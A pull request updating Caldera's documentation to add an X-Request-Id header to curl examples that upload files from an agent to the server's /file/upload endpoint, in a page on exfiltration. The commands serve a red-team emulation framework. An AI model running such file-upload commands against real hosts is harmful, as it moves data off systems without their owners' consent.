### PR TITLE
Add `X-Request-Id` to API docs

### DIFF
--- a/sphinx-docs/Exfiltration.md
+++ b/sphinx-docs/Exfiltration.md
@@ -6,7 +6,7 @@ After completing an operation a user may want to review the data retrieved from 
 
 Some abilities will transfer files from the agent to the Caldera server. This can be done manually with 
 ```yaml
-curl -X POST -F 'data=@/file/path/' http://server_ip:8888/file/upload
+curl -X POST -F 'data=@/file/path/' --header "X-Request-Id:`hostname`-#{paw}" http://server_ip:8888/file/upload
 ```
 Note: localhost could be rejected in place of the server IP. In this case you will get error 7. You should type out the full IP.
 These files are sent from the agent to server_ip/file/upload at which point the server places these files inside the directory specified by [/conf/default.yml to key "exfil_dir"](Server-Configuration.md#configuration-file). By default it is set to `/tmp/caldera`.

--- a/sphinx-docs/The-REST-API.md
+++ b/sphinx-docs/The-REST-API.md
@@ -94,9 +94,11 @@ To learn more about these options, read the "What is an operation?" documentatio
 
 Files can be uploaded to Caldera by POST'ing a file to the /file/upload endpoint. Uploaded files will be put in the exfil_dir location specified in the default.yml file.
 
-#### Example
+The `X-Request-Id` header should be set to `<agent_hostname>-<agent_paw_print>`. 
+
+#### Example (linux)
 ```bash
-curl -F 'data=@path/to/file' http://localhost:8888/file/upload
+curl -F 'data=@path/to/file' --header "X-Request-Id:`hostname`-#{paw}" http://localhost:8888/file/upload
 ```
 
 ## /file/download


### PR DESCRIPTION
Add reference to what appears to be a required `X-Request-Id` header for `/file/upload` in the API docs and the example under exfiltration.

See https://github.com/mitre/caldera/issues/2786 .